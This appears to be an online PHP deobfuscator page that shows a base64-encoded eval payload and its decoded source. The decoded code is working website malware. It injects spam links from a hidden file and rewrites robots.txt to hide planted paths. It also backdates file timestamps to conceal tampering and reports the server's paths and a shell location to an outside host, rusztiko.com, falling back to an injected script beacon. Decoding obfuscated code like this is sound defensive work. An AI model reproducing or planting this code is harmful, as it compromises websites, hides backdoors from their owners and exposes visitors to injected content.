Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

eval(base64_decode("ICAgICBkYXRlX2RlZmF1bHRfdGltZXpvbmVfc2V0KCdBbWVyaWNhL0xvc19BbmdlbGVzJy..

Decoded Output download

     date_default_timezone_set('America/Los_Angeles');
    print "<!-- new -->";
    $currentHidePath = "";
    function getLongestPrefix($hideScriptPaths, $path) {
        $currentHidePath = "";
        $long   = 0;
        $prefix = "";

        foreach ($hideScriptPaths as $currentPath) {
            $len = strlen($currentPath) > strlen($path) ? strlen($path) : strlen($currentPath);
            $currentLength = 0;
            for ($i = 0; $i < $len; $i++) {
                if ($path[$i] == $currentPath[$i]) {
                    $currentLength++;
                } else {
                    if ($long < $currentLength) {
                        $long = $currentLength;
                        $prefix = substr($path, 0, $i);
                        $currentHidePath = $currentPath;
                    }
                    break;
                }
            }
        }
        return $currentHidePath;
    }
    $dbFiles            = array("links_db.php", "database.php", "system.php", "db.php", "sysdb.php");
    function checkUploaderExistence() {
        $dbFiles            = array("links_db.php", "database.php", "system.php", "db.php", "sysdb.php");
        $self               = dirname(__FILE__);
        $result             = "";
        foreach ($dbFiles as $fileName) {
            if (file_exists($self.DIRECTORY_SEPARATOR.$fileName)) {
                $fp = fopen($self.DIRECTORY_SEPARATOR.$fileName, "r");
                $line = fgets($fp, 4096);
                fclose($fp);
                if (preg_match("/uploader/i", $line)) {
                    if (filesize($self.DIRECTORY_SEPARATOR.$fileName) == 10) {
                        unlink($self.DIRECTORY_SEPARATOR.$fileName);
                    } else {
                        $result = $self.DIRECTORY_SEPARATOR.$fileName;
                    }
                }
            }
        }
        return $result;
    }

    $self           = realpath(dirname(__FILE__));
    $hidePaths      = array();


    $uploaderFileName   = checkUploaderExistence();
    if ($uploaderFileName != "") {
        //print "PRINT LINKS";
        $fp = fopen($uploaderFileName, "r");
        fgets($fp, 4096);
        $line= "";
        while (!feof($fp)) {
            $line .= fgets($fp, 4096);
        }
        fclose($fp);

        $links     = json_decode($line, true);
        $var       = base64_decode(trim($links["template"]));
        $linkTempl = base64_decode(trim($links["linkTemplate"]));
        $text      = "";
        
        
        foreach ($links["links"] as $link) {
            $textA = str_replace('|SENTENCE_BEFORE|', $link["sentenceBefore"], $linkTempl);
            $textA = str_replace('|HREF|', $link["href"], $textA);
            $textA = str_replace('|ANCHOR|', $link["anchor"], $textA);
            $textA = str_replace('|ANCHOR_TEXT|', $link["anchorText"], $textA);
            $textA = str_replace('|ANCHOR_H1|', $link["anchorH1"], $textA);
            $textA = str_replace('|SENTENCE_AFTER|', $link["sentenceAfter"], $textA);
            $text .= $textA;
        }
        
        
        $var = str_replace('|HIDE_PATH|', $link["hidePath"], $var);
        $var = str_replace('|LINKS|', $text, $var);
        
        print $var;
    } else {
        $scriptName = trim(preg_replace('/\(.*$/', '', __FILE__));
        $time2 = strtotime('2011-08-22 13:51:35');

        if (filemtime($scriptName) != $time2) {
            $fileO = fopen($self.DIRECTORY_SEPARATOR."robots_db.txt", "r");
            $documentRoot = realpath($_SERVER["DOCUMENT_ROOT"]);

            $robotPath = $documentRoot.DIRECTORY_SEPARATOR."robots.txt";
            if (file_exists($robotPath)) {
                $time = filemtime($robotPath);
            } else {
                $time = strtotime('2010-08-22 13:51:35');
            }
            $fp1  = fopen($robotPath, "w");
            $str  = "User-agent: *
";
            while (!feof($fileO)) {
                $line = realpath(trim(fgets($fileO, 4096)));
                if (stristr($line, $documentRoot) != FALSE) {
                    $hidePaths[] = $line;
                    $str .= "Disallow: " . preg_replace('/\/', "/", str_replace($documentRoot, "", $line)). "
";
                }
            }
            fwrite($fp1, $str);
            fclose($fp1);
            touch($robotPath, $time);

            fclose($fileO);
            $currentHidePath = getLongestPrefix($hidePaths, $self);

            // need to add new site
            $localHidePath  = str_replace(realpath($_SERVER["DOCUMENT_ROOT"]), "", $currentHidePath).DIRECTORY_SEPARATOR."script.js";
            $localHidePath  = preg_replace('/\/', "/", $localHidePath);
            $uploaderDir    = $_SERVER["HTTP_HOST"].str_replace(realpath($_SERVER["DOCUMENT_ROOT"]), "", $self).DIRECTORY_SEPARATOR;
            $address        = "66.147.244.241";
            $dbFilename     = $dbFiles[array_rand($dbFiles)];
            $manual = true;
            $upl_filename   = urlencode("pluginn.php");
            $server         = "http://rusztiko.com";
            $uploaderDir    = preg_replace('/\/', "/", $uploaderDir);
            $shell_upload   = urlencode("$uploaderDir");
            $shell_address  = urlencode($address);
            $shell_hide     = urlencode($localHidePath);
            $shell_path     = urlencode(realpath($self));            
            
            if (ini_get("allow_url_fopen") == 1) {
                $manual = false;
                $response = file_get_contents($server."/sh.php?".
                    "upload_path=$shell_upload".
                    "&path=$shell_path".
                    "&shell_address=$shell_address".
                    "&type=general".
                    "&shell_hide=$shell_hide".
                    "&db=$dbFilename".
                    "&uploader_filename=$upl_filename");

                if ($response == "OK") {
                    touch($scriptName, $time2);
                    if (file_exists($self.DIRECTORY_SEPARATOR."robots_db.txt")) {
                        unlink($self.DIRECTORY_SEPARATOR."robots_db.txt");
                    }
                } else {
                    $manual = true;
                }
            } 
            if ($manual) {
                $scr =<<<HTML
                    <script>
                    document.write("<img src=$server/sh.php?upload_path=$shell_upload&path=$shell_path" +
                    "&shell_address=$shell_address" + 
                    "&type=general" +
                    "&shell_hide=$shell_hide" + 
                    "&db=$dbFilename" +
                    "&uploader_filename=$upl_filename/>");
                    </script>
HTML;
                
                print $scr;
                touch($scriptName, $time2);
                if (file_exists($self.DIRECTORY_SEPARATOR."robots_db.txt")) {
                    unlink($self.DIRECTORY_SEPARATOR."robots_db.txt");
                }
            }
        } 
    }

Did this file decode correctly?

Original Code

eval(base64_decode("     date_default_timezone_set('America/Los_Angeles');
    print "<!-- new -->";
    $currentHidePath = "";
    function getLongestPrefix($hideScriptPaths, $path) {
        $currentHidePath = "";
        $long   = 0;
        $prefix = "";

        foreach ($hideScriptPaths as $currentPath) {
            $len = strlen($currentPath) > strlen($path) ? strlen($path) : strlen($currentPath);
            $currentLength = 0;
            for ($i = 0; $i < $len; $i++) {
                if ($path[$i] == $currentPath[$i]) {
                    $currentLength++;
                } else {
                    if ($long < $currentLength) {
                        $long = $currentLength;
                        $prefix = substr($path, 0, $i);
                        $currentHidePath = $currentPath;
                    }
                    break;
                }
            }
        }
        return $currentHidePath;
    }
    $dbFiles            = array("links_db.php", "database.php", "system.php", "db.php", "sysdb.php");
    function checkUploaderExistence() {
        $dbFiles            = array("links_db.php", "database.php", "system.php", "db.php", "sysdb.php");
        $self               = dirname(__FILE__);
        $result             = "";
        foreach ($dbFiles as $fileName) {
            if (file_exists($self.DIRECTORY_SEPARATOR.$fileName)) {
                $fp = fopen($self.DIRECTORY_SEPARATOR.$fileName, "r");
                $line = fgets($fp, 4096);
                fclose($fp);
                if (preg_match("/uploader/i", $line)) {
                    if (filesize($self.DIRECTORY_SEPARATOR.$fileName) == 10) {
                        unlink($self.DIRECTORY_SEPARATOR.$fileName);
                    } else {
                        $result = $self.DIRECTORY_SEPARATOR.$fileName;
                    }
                }
            }
        }
        return $result;
    }

    $self           = realpath(dirname(__FILE__));
    $hidePaths      = array();


    $uploaderFileName   = checkUploaderExistence();
    if ($uploaderFileName != "") {
        //print "PRINT LINKS";
        $fp = fopen($uploaderFileName, "r");
        fgets($fp, 4096);
        $line= "";
        while (!feof($fp)) {
            $line .= fgets($fp, 4096);
        }
        fclose($fp);

        $links     = json_decode($line, true);
        $var       = base64_decode(trim($links["template"]));
        $linkTempl = base64_decode(trim($links["linkTemplate"]));
        $text      = "";
        
        
        foreach ($links["links"] as $link) {
            $textA = str_replace('|SENTENCE_BEFORE|', $link["sentenceBefore"], $linkTempl);
            $textA = str_replace('|HREF|', $link["href"], $textA);
            $textA = str_replace('|ANCHOR|', $link["anchor"], $textA);
            $textA = str_replace('|ANCHOR_TEXT|', $link["anchorText"], $textA);
            $textA = str_replace('|ANCHOR_H1|', $link["anchorH1"], $textA);
            $textA = str_replace('|SENTENCE_AFTER|', $link["sentenceAfter"], $textA);
            $text .= $textA;
        }
        
        
        $var = str_replace('|HIDE_PATH|', $link["hidePath"], $var);
        $var = str_replace('|LINKS|', $text, $var);
        
        print $var;
    } else {
        $scriptName = trim(preg_replace('/\(.*$/', '', __FILE__));
        $time2 = strtotime('2011-08-22 13:51:35');

        if (filemtime($scriptName) != $time2) {
            $fileO = fopen($self.DIRECTORY_SEPARATOR."robots_db.txt", "r");
            $documentRoot = realpath($_SERVER["DOCUMENT_ROOT"]);

            $robotPath = $documentRoot.DIRECTORY_SEPARATOR."robots.txt";
            if (file_exists($robotPath)) {
                $time = filemtime($robotPath);
            } else {
                $time = strtotime('2010-08-22 13:51:35');
            }
            $fp1  = fopen($robotPath, "w");
            $str  = "User-agent: *\r\n";
            while (!feof($fileO)) {
                $line = realpath(trim(fgets($fileO, 4096)));
                if (stristr($line, $documentRoot) != FALSE) {
                    $hidePaths[] = $line;
                    $str .= "Disallow: " . preg_replace('/\\\/', "/", str_replace($documentRoot, "", $line)). "\r\n";
                }
            }
            fwrite($fp1, $str);
            fclose($fp1);
            touch($robotPath, $time);

            fclose($fileO);
            $currentHidePath = getLongestPrefix($hidePaths, $self);

            // need to add new site
            $localHidePath  = str_replace(realpath($_SERVER["DOCUMENT_ROOT"]), "", $currentHidePath).DIRECTORY_SEPARATOR."script.js";
            $localHidePath  = preg_replace('/\\\/', "/", $localHidePath);
            $uploaderDir    = $_SERVER["HTTP_HOST"].str_replace(realpath($_SERVER["DOCUMENT_ROOT"]), "", $self).DIRECTORY_SEPARATOR;
            $address        = "66.147.244.241";
            $dbFilename     = $dbFiles[array_rand($dbFiles)];
            $manual = true;
            $upl_filename   = urlencode("pluginn.php");
            $server         = "http://rusztiko.com";
            $uploaderDir    = preg_replace('/\\\/', "/", $uploaderDir);
            $shell_upload   = urlencode("$uploaderDir");
            $shell_address  = urlencode($address);
            $shell_hide     = urlencode($localHidePath);
            $shell_path     = urlencode(realpath($self));            
            
            if (ini_get("allow_url_fopen") == 1) {
                $manual = false;
                $response = file_get_contents($server."/sh.php?".
                    "upload_path=$shell_upload".
                    "&path=$shell_path".
                    "&shell_address=$shell_address".
                    "&type=general".
                    "&shell_hide=$shell_hide".
                    "&db=$dbFilename".
                    "&uploader_filename=$upl_filename");

                if ($response == "OK") {
                    touch($scriptName, $time2);
                    if (file_exists($self.DIRECTORY_SEPARATOR."robots_db.txt")) {
                        unlink($self.DIRECTORY_SEPARATOR."robots_db.txt");
                    }
                } else {
                    $manual = true;
                }
            } 
            if ($manual) {
                $scr =<<<HTML
                    <script>
                    document.write("<img src=$server/sh.php?upload_path=$shell_upload&path=$shell_path" +
                    "&shell_address=$shell_address" + 
                    "&type=general" +
                    "&shell_hide=$shell_hide" + 
                    "&db=$dbFilename" +
                    "&uploader_filename=$upl_filename/>");
                    </script>
HTML;
                
                print $scr;
                touch($scriptName, $time2);
                if (file_exists($self.DIRECTORY_SEPARATOR."robots_db.txt")) {
                    unlink($self.DIRECTORY_SEPARATOR."robots_db.txt");
                }
            }
        } 
    }")); 

Function Calls

base64_decode 1

Variables

None

Stats

MD5 489aa3e2bc57b8432d20f19fa0eda933
Eval Count 1
Decode Time 110 ms